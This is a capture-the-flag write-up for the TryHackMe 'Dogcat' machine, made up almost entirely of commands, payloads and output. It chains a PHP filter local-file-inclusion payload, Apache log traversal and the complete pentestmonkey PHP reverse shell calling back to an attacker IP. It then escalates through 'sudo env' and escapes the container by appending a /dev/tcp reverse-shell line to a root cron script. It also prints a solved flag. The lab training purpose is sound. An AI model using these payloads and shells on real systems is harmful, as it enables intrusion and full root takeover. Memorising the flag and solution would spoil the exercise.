THM平台|Dogcat靶机记录

┌──(kali㉿kali)-[~/桌面]└─$ nmap -sV -sC -A 10.10.192.87    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 03:33 EDTNmap scan report for 10.10.192.87Host is up (0.26s latency).Not shown: 998 closed tcp ports (conn-refused)PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)80/tcp open  http    Apache httpd 2.4.38 ((Debian))                                                |_http-server-header: Apache/2.4.38 (Debian)                                                       |_http-title: dogcat                                                                               Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                            

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .     Nmap done: 1 IP address (1 host up) scanned in 198.40 seconds

┌──(kali㉿kali)-[~/桌面]└─$ gobuster dir -u 10.10.230.77 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,html,php,js,zip -t 50  -q          /index.php            (Status: 200) [Size: 418]/.html                (Status: 403) [Size: 277]/cat.php              (Status: 200) [Size: 26]/flag.php             (Status: 200) [Size: 0]/cats                 (Status: 301) [Size: 311] [--> http://10.10.230.77/cats/]/dogs                 (Status: 301) [Size: 311] [--> http://10.10.230.77/dogs/]/dog.php              (Status: 200) [Size: 26]

?view=php://filter/convert.base64-encode/resource=cat/../flag

┌──(kali㉿kali)-[~/桌面]└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" |base64 -d<?php$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"?>

┌──(kali㉿kali)-[~/桌面]└─$ echo "PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== " |base64 -d<!DOCTYPE HTML><html><head>    <title>dogcat</title>    <link rel="stylesheet" type="text/css" href="/style.css"></head>

<body>    <h1>dogcat</h1>    <i>a gallery of various dogs or cats</i>

    <div>        <h2>What would you like to see?</h2>        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>        <?php            function containsStr($str, $substr) {                return strpos($str, $substr) !== false;            }            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';            if(isset($_GET['view'])) {                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {                    echo 'Here you go!';                    include $_GET['view'] . $ext;                } else {                    echo 'Sorry, only dogs or cats are allowed.';                }            }        ?>    </div></body>

curl "http://10.10.28.150/?view=cat/../../../log/apache2/access.log&ext="<!DOCTYPE HTML><html>

<head>    <title>dogcat</title>    <link rel="stylesheet" type="text/css" href="/style.css"></head>

<body>    <h1>dogcat</h1>    <i>a gallery of various dogs or cats</i>

    <div>        <h2>What would you like to see?</h2>        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>        Here you go!10.18.9.239 - - [26/Apr/2024:06:25:53 +0000] "GET / HTTP/1.1" 200 537 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"10.18.9.239 - - [26/Apr/2024:06:25:54 +0000] "GET /style.css HTTP/1.1" 200 698 "http://10.10.28.150/" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"10.18.9.239 - - [26/Apr/2024:06:25:54 +0000] "GET /favicon.ico HTTP/1.1" 404 491 "http://10.10.28.150/" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

<?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 [email protected]//// This tool may be used for legal purposes only.  Users take full responsibility// for any actions performed using this tool.  The author accepts no liability// for damage caused by this tool.  If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only.  Users take full responsibility// for any actions performed using this tool.  If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at [email protected]//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);$VERSION = "1.0";$ip = '10.18.9.239';  // CHANGE THIS$port = 1234;       // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;

//// Daemonise ourself if possible to avoid zombies later//

// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies.  Worth a try...if (function_exists('pcntl_fork')) {    // Fork and have the parent process exit    $pid = pcntl_fork();        if ($pid == -1) {        printit("ERROR: Can't fork");        exit(1);    }        if ($pid) {        exit(0);  // Parent exits    }

    // Make the current process a session leader    // Will only succeed if we forked    if (posix_setsid() == -1) {        printit("Error: Can't setsid()");        exit(1);    }

    $daemon = 1;} else {    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}

// Change to a safe directorychdir("/");

// Remove any umask we inheritedumask(0);

//// Do the reverse shell...//

// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {    printit("$errstr ($errno)");    exit(1);}

// Spawn shell process$descriptorspec = array(   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to   2 => array("pipe", "w")   // stderr is a pipe that the child will write to);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {    printit("ERROR: Can't spawn shell");    exit(1);}

// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {    // Check for end of TCP connection    if (feof($sock)) {        printit("ERROR: Shell connection terminated");        break;    }

    // Check for end of STDOUT    if (feof($pipes[1])) {        printit("ERROR: Shell process terminated");        break;    }

    // Wait until a command is end down $sock, or some    // command output is available on STDOUT or STDERR    $read_a = array($sock, $pipes[1], $pipes[2]);    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send    // data to process's STDIN    if (in_array($sock, $read_a)) {        if ($debug) printit("SOCK READ");        $input = fread($sock, $chunk_size);        if ($debug) printit("SOCK: $input");        fwrite($pipes[0], $input);    }

    // If we can read from the process's STDOUT    // send data down tcp connection    if (in_array($pipes[1], $read_a)) {        if ($debug) printit("STDOUT READ");        $input = fread($pipes[1], $chunk_size);        if ($debug) printit("STDOUT: $input");        fwrite($sock, $input);    }

    // If we can read from the process's STDERR    // send data down tcp connection    if (in_array($pipes[2], $read_a)) {        if ($debug) printit("STDERR READ");        $input = fread($pipes[2], $chunk_size);        if ($debug) printit("STDERR: $input");        fwrite($sock, $input);    }}

fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);

// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {    if (!$daemon) {        print "$stringn";    }}

?> 

$ sudo -lMatching Defaults entries for www-data on b6d614bbefa9:    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on b6d614bbefa9:    (root) NOPASSWD: /usr/bin/env

sudo env /bin/sh

#!/bin/bashtar cf /root/container/backup/backup.tar /root/container

echo 'bash -i >& /dev/tcp/10.18.9.239/6666 0>&1' >> backup.sh

root@dogcat:~/container/backup# crontab -lcrontab -l# Edit this file to introduce tasks to be run by cron.# # Each task to run has to be defined through a single line# indicating with different fields when the task will be run# and what command to run for the task# # To define the time you can provide concrete values for# minute (m), hour (h), day of month (dom), month (mon),# and day of week (dow) or use '*' in these fields (for 'any').# # Notice that tasks will be started based on the cron's system# daemon's notion of time and timezones.# # Output of the crontab jobs (including errors) is sent through# email to the user the crontab file belongs to (unless redirected).# # For example, you can run a backup of all your user accounts# at 5 a.m every week with:# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/# # For more information see the manual pages of crontab(5) and cron(8)# # m h  dom mon dow   command* * * * * /root/container/backup/backup.sh@reboot /root/container/launch.shcat launch.sh#!/bin/bashdocker run -d -p 80:80 -v /root/container/backup:/opt/backups --rm box